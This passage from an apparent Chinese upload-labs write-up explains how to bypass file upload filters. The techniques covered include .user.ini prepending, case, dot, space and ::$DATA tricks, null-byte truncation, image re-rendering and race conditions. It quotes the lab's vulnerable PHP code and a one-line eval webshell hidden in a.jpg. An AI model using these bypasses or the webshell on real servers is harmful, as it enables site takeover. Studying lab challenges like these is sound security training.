auto_prepend_file\/\/\u76f8\u5f53\u4e8e\u5728\u6240\u6709php\u5f00\u5934\u5199\u5165require\nauto_append_file\/\/\u76f8\u5f53\u4e8e\u5728php\u6700\u540e\u5199\u5165require<\/code><\/pre>\n\u5047\u8bbe\u73b0\u5728\u76ee\u5f55\u4e0b\u6709\u4e00\u4e2aindex.php\u6587\u4ef6,\u8be5\u76ee\u5f55\u53ef\u4ee5\u8fdb\u884c\u4e0a\u4f20<\/p>\n
\u6211\u4eec\u9700\u8981\u4e0a\u4f20\u4e24\u4e2a\u6587\u4ef6\u6765\u8fdb\u884c\u5229\u7528<\/p>\n
\u9996\u5148\u662f<\/p>\n
a.jpg\n\/\/\u5185\u5bb9\u662f\uff1a\n<?php eval($_GET['shell']); ?><\/code><\/pre>\n\u7136\u540e\u662f.user.ini\u6587\u4ef6<\/p>\n
auto_prepend_file=a.jpg<\/code><\/pre>\n\u76f8\u5f53\u4e8e\u5728\u6240\u6709php\u6587\u4ef6\u5934\u91cc\u5199\u5165\u4e86require('.\/a.jpg')<\/p>\n
\u5927\u5c0f\u5199\u7ed5\u8fc7-upload-labs-05<\/strong><\/h6>\n$is_upload = false;\n$msg = null;\nif (isset($_POST['submit'])) {\n if (file_exists(UPLOAD_PATH)) {\n $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");\n $file_name = trim($_FILES['upload_file']['name']);\n $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n $file_ext = strrchr($file_name, '.');\n $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n $file_ext = str_ireplace('::$DATA', '', $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n if (!in_array($file_ext, $deny_ext)) {\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $img_path = UPLOAD_PATH.'\/'.$file_name;\n if (move_uploaded_file($temp_file, $img_path)) {\n $is_upload = true;\n } else {\n $msg = '\u4e0a\u4f20\u51fa\u9519\uff01';\n }\n } else {\n $msg = '\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01';\n }\n } else {\n $msg = UPLOAD_PATH . '\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01';\n }\n}<\/code><\/pre>\n\u4ee3\u7801\u672a\u8fc7\u6ee4\u5927\u5c0f\u5199\uff0c\u5bfc\u81f4Php\u53ef\u4e0a\u4f20\u540e\u4efb\u53ef\u89e3\u6790\u4e3aphp<\/p>\n
\u52a0\u70b9\u7ed5\u8fc7-upload-labs-07<\/strong><\/h6>\n$is_upload = false;\n$msg = null;\nif (isset($_POST['submit'])) {\n if (file_exists(UPLOAD_PATH)) {\n $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");\n $file_name = $_FILES['upload_file']['name'];\n $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n $file_ext = strrchr($file_name, '.');\n $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n $file_ext = str_ireplace('::$DATA', '', $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n\n if (!in_array($file_ext, $deny_ext)) {\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $img_path = UPLOAD_PATH.'\/'.date("YmdHis").rand(1000,9999).$file_ext;\n if (move_uploaded_file($temp_file,$img_path)) {\n $is_upload = true;\n } else {\n $msg = '\u4e0a\u4f20\u51fa\u9519\uff01';\n }\n } else {\n $msg = '\u6b64\u6587\u4ef6\u4e0d\u5141\u8bb8\u4e0a\u4f20';\n }\n } else {\n $msg = UPLOAD_PATH . '\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01';\n }\n}<\/code><\/pre>\n\u5728windows\u4e2d\u4e00\u4e2a\u6587\u4ef6\u7684\u540e\u7f00\u52a0\u4e0a\u4e00\u4e2a\u70b9\u4e0e\u539f\u6765\u7684\u540e\u7f00\u6ca1\u6709\u533a\u522b\uff0c\u4ece\u800c\u7528\u6765\u6587\u4ef6\u4e0a\u4f20\u7ed5\u8fc7<\/p>\n
\u7a7a\u683c\u7ed5\u8fc7-upload-labs-06<\/strong><\/h6>\n$is_upload = false;\n$msg = null;\nif (isset($_POST['submit'])) {\n if (file_exists(UPLOAD_PATH)) {\n $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");\n $file_name = trim($_FILES['upload_file']['name']);\n $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n $file_ext = strrchr($file_name, '.');\n $file_ext = str_ireplace('::$DATA', '', $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n if (!in_array($file_ext, $deny_ext)) {\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $img_path = UPLOAD_PATH.'\/'.date("YmdHis").rand(1000,9999).$file_ext;\n if (move_uploaded_file($temp_file, $img_path)) {\n $is_upload = true;\n } else {\n $msg = '\u4e0a\u4f20\u51fa\u9519\uff01';\n }\n } else {\n $msg = '\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01';\n }\n } else {\n $msg = UPLOAD_PATH . '\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01';\n }\n}<\/code><\/pre>\n\u7531\u4e8e\u6ca1\u6709\u5bf9\u6587\u4ef6\u540e\u7f00\u540d\u8fdb\u884c\u53bb\u7a7a\uff0c\u56e0\u6b64\u53ef\u4ee5\u5728\u540e\u7f00\u540d\u52a0\u7a7a\u683c\u7ed5\u8fc7\uff0c\u6587\u4ef6\u5c5e\u6027\u4e0d\u4f1a\u53d8<\/p>\n
::$$DATA\u6570\u636e\u6d41\u7ed5\u8fc7<\/code><\/strong>-upload-labs-08<\/h6>\n\u5728php+windows\u7684\u60c5\u51b5\u4e0b\uff1a\u5982\u679c\u6587\u4ef6\u540d+\u201d::$DATA<\/code>\u201c\u4f1a\u628a::$DATA<\/code>\u4e4b\u540e\u7684\u6570\u636e\u5f53\u6210\u6587\u4ef6\u6d41\u5904\u7406,\u4e0d\u4f1a\u68c0\u6d4b\u540e\u7f00\u540d.\u4e14\u4fdd\u6301\u201d::$DATA<\/code>\u201c\u4e4b\u524d\u7684\u6587\u4ef6\u540d<\/p>\n\u914d\u5408\u89e3\u6790\u7ed5\u8fc7 upload-labs-9<\/strong><\/h6>\n$is_upload = false;\n$msg = null;\nif (isset($_POST['submit'])) {\n if (file_exists(UPLOAD_PATH)) {\n $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");\n $file_name = trim($_FILES['upload_file']['name']);\n $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n $file_ext = strrchr($file_name, '.');\/\/\u8fdb\u884c\u62fc\u63a5\n $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n if (!in_array($file_ext, $deny_ext)) {\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $img_path = UPLOAD_PATH.'\/'.date("YmdHis").rand(1000,9999).$file_ext;\n if (move_uploaded_file($temp_file, $img_path)) {\n $is_upload = true;\n } else {\n $msg = '\u4e0a\u4f20\u51fa\u9519\uff01';\n }\n } else {\n $msg = '\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01';\n }\n } else {\n $msg = UPLOAD_PATH . '\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01';\n }\n}\n<\/code><\/pre>\n\u7531\u4e8e\u4ee3\u7801\u5bf9\u6587\u4ef6\u540d\u6700\u540e\u662f\u8fdb\u884c\u62fc\u63a5\u7684\uff0c\u53ef\u4ee5\u4f2a\u9020\u6587\u4ef6\u540d
\n\u4ee3\u7801\u5148\u662f\u53bb\u9664\u6587\u4ef6\u540d\u524d\u540e\u7684\u7a7a\u683c\uff0c\u518d\u53bb\u9664\u6587\u4ef6\u540d\u6700\u540e\u6240\u6709\u7684\u201c.\u201d\uff0c\u518d\u901a\u8fc7strrchar\u51fd\u6570\u6765\u5bfb\u627e\u201c.\u201d\u6765\u786e\u8ba4\u6587\u4ef6\u540d\u7684\u540e\u7f00\uff0c\u4f46\u662f\u6700\u540e\u4fdd\u5b58\u6587\u4ef6\u7684\u65f6\u5019\u6ca1\u6709\u91cd\u547d\u540d\u800c\u4f7f\u7528\u7684\u539f\u59cb\u7684\u6587\u4ef6\u540d\uff0c\u5bfc\u81f4\u53ef\u4ee5\u5229\u75281.php. .\uff08\u70b9+\u7a7a\u683c+\u70b9\uff09\u6765\u7ed5\u8fc7<\/p>\n
\u53cc\u540e\u7f00\u89e3\u6790 upload-labs-10<\/strong><\/h6>\n$is_upload = false;\n$msg = null;\nif (isset($_POST['submit'])) {\n if (file_exists(UPLOAD_PATH)) {\n $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");\n $file_name = trim($_FILES['upload_file']['name']);\n $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n $file_ext = strrchr($file_name, '.');\n $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n $file_ext = str_ireplace('::$DATA', '', $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n if (!in_array($file_ext, $deny_ext)) {\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $img_path = UPLOAD_PATH.'\/'.$file_name;\n if (move_uploaded_file($temp_file, $img_path)) {\n $is_upload = true;\n } else {\n $msg = '\u4e0a\u4f20\u51fa\u9519\uff01';\n }\n } else {\n $msg = '\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01';\n }\n } else {\n $msg = UPLOAD_PATH . '\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01';\n }\n}<\/code><\/pre>\n\u7531\u4e8e\u4ee3\u7801\u51fd\u6570\u903b\u8f91\u539f\u56e0\uff0c1.pphphp \u6700\u540e\u7ecf\u8fc7\u51fd\u6570\u8fc7\u6ee4\u5b8c\u53c8\u6062\u590d\u4e3a1.php\u4ece\u800c\u7ed5\u8fc7\u3002\u5177\u4f53\u8fd8\u662f\u8981\u4ee3\u7801\u5ba1\u8ba1\uff0c\u67e5\u627e\u914d\u5408\u89e3\u6790\u6f0f\u6d1e<\/p>\n
\u767d\u540d\u5355\u7ed5\u8fc7<\/h5>\nMIME\u7ed5\u8fc7-uplod-labs-02<\/strong><\/h6>\nMIME\u5373\u4e3aContent-Type: image\/gif \u5728\u6709\u4e9b\u65f6\u5019\u5bf9MIME\u6709\u8fc7\u6ee4\uff0c\u5373\u53ef\u5c06\u5141\u8bb8\u4e0a\u4f20\u6587\u4ef6MIMEcopy\u7ed9\u8981\u4e0a\u4f20\u7684\u6587\u4ef6\u5c5e\u6027\uff0c\u4ece\u800c\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n
text\/plain\uff1a\u7eaf\u6587\u672c\uff0c\u6587\u4ef6\u6269\u5c55\u540d.txt\ntext\/html\uff1aHTML\u6587\u672c\uff0c\u6587\u4ef6\u6269\u5c55\u540d.htm\u548c.html\nimage\/jpeg\uff1ajpeg\u683c\u5f0f\u7684\u56fe\u7247\uff0c\u6587\u4ef6\u6269\u5c55\u540d.jpg\nimage\/gif\uff1aGIF\u683c\u5f0f\u7684\u56fe\u7247\uff0c\u6587\u4ef6\u6269\u5c55\u540d.gif\naudio\/x-wave\uff1aWAVE\u683c\u5f0f\u7684\u97f3\u9891\uff0c\u6587\u4ef6\u6269\u5c55\u540d.wav\naudio\/mpeg\uff1aMP3\u683c\u5f0f\u7684\u97f3\u9891\uff0c\u6587\u4ef6\u6269\u5c55\u540d.mp3\nvideo\/mpeg\uff1aMPEG\u683c\u5f0f\u7684\u89c6\u9891\uff0c\u6587\u4ef6\u6269\u5c55\u540d.mpg\napplication\/zip\uff1aPK-ZIP\u683c\u5f0f\u7684\u538b\u7f29\u6587\u4ef6\uff0c\u6587\u4ef6\u6269\u5c55\u540d.zip<\/code><\/pre>\n%00\u622a\u65ad-upload-labs\u201311<\/strong><\/h6>\n\u622a\u65ad\u6761\u4ef6\uff1aphp\u7248\u672c\u5c0f\u4e8e5.3.4\uff0cphp\u7684magic_quotes_gpc\u4e3aOFF\u72b6\u6001
\n%00\u622a\u65ad\u7528\u5728\u6570\u636e\u5305\u7684\u6587\u4ef6url\u5730\u5740\u4e0a\u9762\uff0c\u5728url\u5730\u5740\u6587\u4ef6\u5730\u5740\u540e\u52a0\u4e0a\u622a\u65ad\u5373\u53ef<\/p>\n
\/upload\/1.php%00 \u4f7f\u62fc\u63a5\u65e0\u6cd5\u5b9e\u73b0 \u539f\u6765\u56fe\u7247\u5305\u542b\u6587\u4ef6\u5185\u5bb9\u5c06\u5199\u51651.php \uff0c\u8bbf\u95ee1.php\u5373\u53ef<\/code><\/pre>\n0x00\u622a\u65ad-upload-labs-12<\/strong><\/h6>\n$is_upload = false;\n$msg = null;\nif(isset($_POST['submit'])){\n $ext_arr = array('jpg','png','gif');\n $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);\n if(in_array($file_ext,$ext_arr)){\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $img_path = $_POST['save_path']."\/".rand(10, 99).date("YmdHis").".".$file_ext;\n\n if(move_uploaded_file($temp_file,$img_path)){\n $is_upload = true;\n } else {\n $msg = "\u4e0a\u4f20\u5931\u8d25";\n }\n } else {\n $msg = "\u53ea\u5141\u8bb8\u4e0a\u4f20.jpg|.png|.gif\u7c7b\u578b\u6587\u4ef6\uff01";\n }\n}<\/code><\/pre>\nsave_path\u53c2\u6570\u901a\u8fc7POST\u65b9\u5f0f\u4f20\u9012\uff0c\u8fd8\u662f\u5229\u752800\u622a\u65ad\uff0c\u56e0\u4e3aPOST\u4e0d\u4f1a\u50cfGET\u5bf9%00\u8fdb\u884c\u81ea\u52a8\u89e3\u7801\uff0c\u6240\u4ee5\u9700\u8981\u5728\u4e8c\u8fdb\u5236\u4e2d\u8fdb\u884c\u4fee\u6539
\n\u7531\u4e8eget\u8bf7\u6c42\u4f1a\u5bf9\u4e00\u4e9b\u5b57\u7b26\u81ea\u52a8\u89e3\u7801\uff0c\u800c\u5728post\u4f20\u9012\uff0c\u4e0d\u4f1a\u5bf9\u5b57\u7b26\u89e3\u7801\uff0c\u6545\u9700\u8981\u6211\u4eec\u81ea\u5df1\u8f6c\u6362
\n\u8fd9\u79cd\u622a\u65ad\u4e0d\u540c\u4e8e%00\uff0c\u5b83\u662f\u5728\u6570\u636e\u5305\u4e2d\u95f4\u7684\u6587\u4ef6\u5730\u5740\uff0c\u6587\u4ef6\u540d\u540e\u622a\u65ad<\/p>\n
0x\u5f00\u5934\u8868\u793a16\u8fdb\u5236\uff0c0\u5728\u5341\u516d\u8fdb\u5236\u4e2d\u662f00, 0x00\u5c31\u662f%00\u89e3\u7801\u6210\u768416\u8fdb\u5236<\/p>\n
![\"image-20220325164231469\"](\"http:\/\/img.danielw.top\/image-20220325164231469-164922824059819.png\")
<\/p>\n
\u5c0620\u6539\u4e3a00<\/p>\n
0x0a\u622a\u65ad<\/strong><\/h6>\n0x0a\u662f\u5341\u516d\u8fdb\u5236\u8868\u793a\u65b9\u6cd5\uff0c\u8868\u793aASCII\u7801\u4e3a\/n\u7684\u6362\u884c\u5b57\u7b26\uff0c\u5177\u4f53\u4e3a\u6362\u884c\u81f3\u4e0b\u4e00\u884c\u884c\u9996\u8d77\u59cb\u4f4d\u7f6e<\/p>\n
\u5176\u4ed6\u7c7b\u578b<\/h5>\n\u6587\u4ef6\u5934\u68c0\u6d4b\u7ed5\u8fc7<\/strong><\/h6>\n\u56fe\u7247\u6587\u4ef6\u4ee5\u5b57\u7b26\u5c55\u793a\u51fa\u6765\u65f6\u5019\uff0c\u6bcf\u4e00\u79cd\u683c\u5f0f\u7684\u56fe\u7247\u7684\u524d\u51e0\u4e2a\u5b57\u7b26\u662f\u56fa\u5b9a\uff0c\u6216\u8005\u662f\u6570\u636e\u5305\u91cc\u9762\u7684Content-Type\u7c7b\u578b\u4fee\u6539\uff0c\u4ece\u800c\u7ed5\u8fc7\u4e0a\u4f20<\/p>\n
\u4e8c\u6b21\u6e32\u67d3\u4e0a\u4f20\u7ed5\u8fc7-upload-labs-16<\/strong><\/h6>\nfunction isImage($filename){\n \/\/\u9700\u8981\u5f00\u542fphp_exif\u6a21\u5757\n $image_type = exif_imagetype($filename);\n switch ($image_type) {\n case IMAGETYPE_GIF:\n return "gif";\n break;\n case IMAGETYPE_JPEG:\n return "jpg";\n break;\n case IMAGETYPE_PNG:\n return "png";\n break; \n default:\n return false;\n break;\n }\n}\n\n$is_upload = false;\n$msg = null;\nif(isset($_POST['submit'])){\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $res = isImage($temp_file);\n if(!$res){\n $msg = "\u6587\u4ef6\u672a\u77e5\uff0c\u4e0a\u4f20\u5931\u8d25\uff01";\n }else{\n $img_path = UPLOAD_PATH."\/".rand(10, 99).date("YmdHis").".".$res;\n if(move_uploaded_file($temp_file,$img_path)){\n $is_upload = true;\n } else {\n $msg = "\u4e0a\u4f20\u51fa\u9519\uff01";\n }\n }\n}<\/code><\/pre>\n\u5728\u6211\u4eec\u5c06\u6587\u4ef6\u4e0a\u4f20\u5230\u670d\u52a1\u5668\uff0c\u6709\u4e00\u4e9b\u670d\u52a1\u5668\u4f1a\u5bf9\u4e0a\u4f20\u7684\u6587\u4ef6\u8fdb\u884c\u4e8c\u6b21\u4fee\u6539\uff0c\u4ee5\u670d\u52a1\u5668\u7684\u7c7b\u578b\u50a8\u5b58\u8d77\u6765\uff0c\u4f46\u662f\u6587\u4ef6\u7684\u5916\u8868\u4e0d\u4f1a\u53d8\u5316\uff0c\u6587\u4ef6\u7684hex\u503c\u4f1a\u53d1\u751f\u4e00\u4e9b\u53d8\u5316\uff0c\u5728upload-16\u5173\uff0c\u53d1\u73b0\u670d\u52a1\u5668\u5bf9\u6211\u4eec\u4e0a\u4f20\u7684\u6587\u4ef6\u8fdb\u884c\u4e8c\u6b21\u6e32\u67d3\uff0c\u5f53\u6211\u4eec\u4e4b\u524d\u5c06\u4e00\u53e5\u8bdd\u6728\u9a6c\u63d2\u5165\u7ecf\u8fc7\u670d\u52a1\u5668\u50a8\u5b58\u540e\u518d\u6b21\u67e5\u770bhex\u503c\u53d1\u73b0\u5f88\u591a\u5730\u65b9\u7684\u503c\u53d1\u751f\u6539\u53d8\uff0c\u6211\u4eec\u7ecf\u8fc7\u539f\u56fe\u7247hex\u503c\u5bf9\u6bd4\uff0c\u53d1\u73b0\u4f1a\u6709\u4e0d\u4f1a\u6539\u53d8\u7684\u503c\uff0c\u6211\u4eec\u5c06\u6728\u9a6c\u63d2\u5165\u5230\u8fd9\u4e00\u4e32\u4e0d\u4f1a\u6539\u53d8\u7684\u503c\u7684\u4f4d\u7f6e\u91cc\u9762\uff0c\u4ece\u800c\u5b9e\u73b0\u4e0a\u4f20webshell<\/p>\n
\u6761\u4ef6\u7ade\u4e89\u7ed5\u8fc7-upload-labs-17<\/strong><\/h6>\n$is_upload = false;\n$msg = null;\nif (isset($_POST['submit'])){\n \/\/ \u83b7\u5f97\u4e0a\u4f20\u6587\u4ef6\u7684\u57fa\u672c\u4fe1\u606f\uff0c\u6587\u4ef6\u540d\uff0c\u7c7b\u578b\uff0c\u5927\u5c0f\uff0c\u4e34\u65f6\u6587\u4ef6\u8def\u5f84\n $filename = $_FILES['upload_file']['name'];\n $filetype = $_FILES['upload_file']['type'];\n $tmpname = $_FILES['upload_file']['tmp_name'];\n\n $target_path=UPLOAD_PATH.'\/'.basename($filename);\n\n \/\/ \u83b7\u5f97\u4e0a\u4f20\u6587\u4ef6\u7684\u6269\u5c55\u540d\n $fileext= substr(strrchr($filename,"."),1);\n\n \/\/\u5224\u65ad\u6587\u4ef6\u540e\u7f00\u4e0e\u7c7b\u578b\uff0c\u5408\u6cd5\u624d\u8fdb\u884c\u4e0a\u4f20\u64cd\u4f5c\n if(($fileext == "jpg") && ($filetype=="image\/jpeg")){\n if(move_uploaded_file($tmpname,$target_path)){\n \/\/\u4f7f\u7528\u4e0a\u4f20\u7684\u56fe\u7247\u751f\u6210\u65b0\u7684\u56fe\u7247\n $im = imagecreatefromjpeg($target_path);\n\n if($im == false){\n $msg = "\u8be5\u6587\u4ef6\u4e0d\u662fjpg\u683c\u5f0f\u7684\u56fe\u7247\uff01";\n @unlink($target_path);\n }else{\n \/\/\u7ed9\u65b0\u56fe\u7247\u6307\u5b9a\u6587\u4ef6\u540d\n srand(time());\n $newfilename = strval(rand()).".jpg";\n \/\/\u663e\u793a\u4e8c\u6b21\u6e32\u67d3\u540e\u7684\u56fe\u7247\uff08\u4f7f\u7528\u7528\u6237\u4e0a\u4f20\u56fe\u7247\u751f\u6210\u7684\u65b0\u56fe\u7247\uff09\n $img_path = UPLOAD_PATH.'\/'.$newfilename;\n imagejpeg($im,$img_path);\n @unlink($target_path);\n $is_upload = true;\n }\n } else {\n $msg = "\u4e0a\u4f20\u51fa\u9519\uff01";\n }\n\n }else if(($fileext == "png") && ($filetype=="image\/png")){\n if(move_uploaded_file($tmpname,$target_path)){\n \/\/\u4f7f\u7528\u4e0a\u4f20\u7684\u56fe\u7247\u751f\u6210\u65b0\u7684\u56fe\u7247\n $im = imagecreatefrompng($target_path);\n\n if($im == false){\n $msg = "\u8be5\u6587\u4ef6\u4e0d\u662fpng\u683c\u5f0f\u7684\u56fe\u7247\uff01";\n @unlink($target_path);\n }else{\n \/\/\u7ed9\u65b0\u56fe\u7247\u6307\u5b9a\u6587\u4ef6\u540d\n srand(time());\n $newfilename = strval(rand()).".png";\n \/\/\u663e\u793a\u4e8c\u6b21\u6e32\u67d3\u540e\u7684\u56fe\u7247\uff08\u4f7f\u7528\u7528\u6237\u4e0a\u4f20\u56fe\u7247\u751f\u6210\u7684\u65b0\u56fe\u7247\uff09\n $img_path = UPLOAD_PATH.'\/'.$newfilename;\n imagepng($im,$img_path);\n\n @unlink($target_path);\n $is_upload = true; \n }\n } else {\n $msg = "\u4e0a\u4f20\u51fa\u9519\uff01";\n }\n\n }else if(($fileext == "gif") && ($filetype=="image\/gif")){\n if(move_uploaded_file($tmpname,$target_path)){\n \/\/\u4f7f\u7528\u4e0a\u4f20\u7684\u56fe\u7247\u751f\u6210\u65b0\u7684\u56fe\u7247\n $im = imagecreatefromgif($target_path);\n if($im == false){\n $msg = "\u8be5\u6587\u4ef6\u4e0d\u662fgif\u683c\u5f0f\u7684\u56fe\u7247\uff01";\n @unlink($target_path);\n }else{\n \/\/\u7ed9\u65b0\u56fe\u7247\u6307\u5b9a\u6587\u4ef6\u540d\n srand(time());\n $newfilename = strval(rand()).".gif";\n \/\/\u663e\u793a\u4e8c\u6b21\u6e32\u67d3\u540e\u7684\u56fe\u7247\uff08\u4f7f\u7528\u7528\u6237\u4e0a\u4f20\u56fe\u7247\u751f\u6210\u7684\u65b0\u56fe\u7247\uff09\n $img_path = UPLOAD_PATH.'\/'.$newfilename;\n imagegif($im,$img_path);\n\n @unlink($target_path);\n $is_upload = true;\n }\n } else {\n $msg = "\u4e0a\u4f20\u51fa\u9519\uff01";\n }\n }else{\n $msg = "\u53ea\u5141\u8bb8\u4e0a\u4f20\u540e\u7f00\u4e3a.jpg|.png|.gif\u7684\u56fe\u7247\u6587\u4ef6\uff01";\n }\n}<\/code><\/pre>\n\u7ade\u4e89\u6761\u4ef6\u53d1\u751f\u5728\u591a\u4e2a\u7ebf\u7a0b\u540c\u65f6\u8bbf\u95ee\u540c\u4e00\u4e2a\u5171\u4eab\u4ee3\u7801\u3001\u53d8\u91cf\u3001\u6587\u4ef6\u7b49\u6ca1\u6709\u8fdb\u884c\u9501\u64cd\u4f5c\u6216\u8005\u540c\u6b65\u64cd\u4f5c\u7684\u573a\u666f\u4e2d\u3002\u5f00\u53d1\u8005\u5728\u8fdb\u884c\u4ee3\u7801\u5f00\u53d1\u65f6\u5e38\u5e38\u503e\u5411\u4e8e\u8ba4\u4e3a\u4ee3\u7801\u4f1a\u4ee5\u7ebf\u6027\u7684\u65b9\u5f0f\u6267\u884c\uff0c\u800c\u4e14\u4ed6\u4eec\u5ffd\u89c6\u4e86\u5e76\u884c\u670d\u52a1\u5668\u4f1a\u5e76\u53d1\u6267\u884c\u591a\u4e2a\u7ebf\u7a0b\uff0c\u8fd9\u5c31\u4f1a\u5bfc\u81f4\u610f\u60f3\u4e0d\u5230\u7684\u7ed3\u679c\u3002\u601d\u8def\u662f\u9996\u5148\u4e0a\u4f20\u4e00\u4e2aphp\u6587\u4ef6\uff0c\u5f53\u7136\u8fd9\u4e2a\u6587\u4ef6\u4f1a\u88ab\u7acb\u9a6c\u5220\u6389\uff0c\u6240\u4ee5\u6211\u4eec\u4f7f\u7528\u591a\u7ebf\u7a0b\u5e76\u53d1\u7684\u8bbf\u95ee\u4e0a\u4f20\u7684\u6587\u4ef6\uff0c\u603b\u4f1a\u6709\u4e00\u6b21\u5728\u4e0a\u4f20\u6587\u4ef6\u5230\u5220\u9664\u6587\u4ef6\u8fd9\u4e2a\u65f6\u95f4\u6bb5\u5185\u8bbf\u95ee\u5230\u4e0a\u4f20\u7684php\u6587\u4ef6\uff0c\u4e00\u65e6\u6211\u4eec\u6210\u529f\u8bbf\u95ee\u5230\u4e86\u4e0a\u4f20\u7684\u6587\u4ef6\uff0c\u90a3\u4e48\u5b83\u5c31\u4f1a\u5411\u670d\u52a1\u5668\u5199\u4e00\u4e2ashell<\/p>\n
\u7a81\u7834getimagesize \u7ed5\u8fc7-upload-labs-14<\/strong><\/h6>\nfunction getReailFileType($filename){\n $file = fopen($filename, "rb");\n $bin = fread($file, 2); \/\/\u53ea\u8bfb2\u5b57\u8282\n fclose($file);\n $strInfo = @unpack("C2chars", $bin); \n $typeCode = intval($strInfo['chars1'].$strInfo['chars2']); \n $fileType = ''; \n switch($typeCode){ \n case 255216: \n $fileType = 'jpg';\n break;\n case 13780: \n $fileType = 'png';\n break; \n case 7173: \n $fileType = 'gif';\n break;\n default: \n $fileType = 'unknown';\n } \n return $fileType;\n}\n\n$is_upload = false;\n$msg = null;\nif(isset($_POST['submit'])){\n $temp_file = $_FILES['upload_file']['tmp_name'];\n $file_type = getReailFileType($temp_file);\n\n if($file_type == 'unknown'){\n $msg = "\u6587\u4ef6\u672a\u77e5\uff0c\u4e0a\u4f20\u5931\u8d25\uff01";\n }else{\n $img_path = UPLOAD_PATH."\/".rand(10, 99).date("YmdHis").".".$file_type;\n if(move_uploaded_file($temp_file,$img_path)){\n 